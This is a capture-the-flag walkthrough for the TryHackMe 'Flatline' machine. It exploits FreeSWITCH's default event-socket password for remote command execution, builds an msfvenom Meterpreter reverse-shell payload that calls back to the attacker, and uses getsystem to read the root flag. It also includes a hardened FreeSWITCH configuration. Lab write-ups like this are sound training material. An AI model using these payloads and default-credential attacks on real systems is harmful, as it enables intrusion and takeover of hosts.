Flatline THM Walkthrough

My tryhackme profile : https://tryhackme.com/p/technoreck

Reconnaissance

Start by scanning the machine to find which ports are open and which services they are running.

nmap -sC -sV -vv -Pn <Target Machine>

On port 8021 we find something interesting: a service named FreeSWITCH. Let's see whether ExploitDB has an exploit for it.

There is a command execution exploit for it; let's download it.

Let's try to understand what the exploit actually does. From the code we can infer that FreeSWITCH is a kind of gateway service with a default password, “ClueCon”, which allows anyone who authenticates to execute arbitrary commands on the host. Let's test it!
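From the defender's side, the weakness the exploit relies on is FreeSWITCH's event socket (mod_event_socket) listening on TCP 8021 with its shipped default password. The following is an added example, not part of the original write-up: the stock event_socket.conf.xml pattern beside a hardened version; the replacement password is a placeholder and the loopback binding is the assumption that only local tools need the socket.

```xml
<!-- Weak: stock FreeSWITCH event_socket.conf.xml pattern. It listens on every
     interface with the well-known default password, so anyone who can reach
     TCP/8021 can run API commands as the FreeSWITCH service account. -->
<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="listen-ip" value="::"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="ClueCon"/>
  </settings>
</configuration>

<!-- Hardened (added example): bind to loopback only, replace the default
     password with a long random secret (placeholder value below), and restrict
     inbound connections with FreeSWITCH's built-in loopback ACL. -->
<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="listen-ip" value="127.0.0.1"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="REPLACE_WITH_LONG_RANDOM_SECRET"/>
    <param name="apply-inbound-acl" value="loopback.auto"/>
  </settings>
</configuration>
```

The nmap scan above reached this service only because it was bound to all interfaces; with the hardened file, only local clients such as fs_cli (which connects to 127.0.0.1:8021 by default) can talk to it.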

Remote Command Execution

Noice! The command worked and we got the name of the user, nekrotic.

Now let's read the user flag directly by running the type command on user.txt in the Desktop folder of the user nekrotic.

User Flag

I tried the same with root.txt, but it threw an error: -ERR no reply.

To go further and get the root flag we need a reverse shell. We will use msfvenom to build a Windows reverse shell payload. Here is the command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > rootkit.exe

Reverse Shell and Root Flag

Now we start an HTTP server on our local machine, transfer rootkit.exe to the host using the command execution, and start a Metasploit listener to receive the connection once the payload is executed on the host. This may take a few minutes because the machine is slow.

Boom! We are in the host's system.

Now, if you run the command “net user”, you will see that the user nekrotic has administrator privileges, yet we still cannot read root.txt. Why?

Most probably the permissions on root.txt have been changed so that only SYSTEM can access it, meaning it can only be read when accessing it as the built-in SYSTEM account. Let me explain this better with an image:

See in the image: even though I am an administrator, if I remove the read permission for this particular text file from my own account, then SYSTEM is the only one that can still access it. But since I am an admin, I can escalate to the SYSTEM account and access everything as SYSTEM. How do we do that? With this command:

getsystem

Now let's try to read the root.txt file again.

Voilà! We got the root flag and completed the challenge.
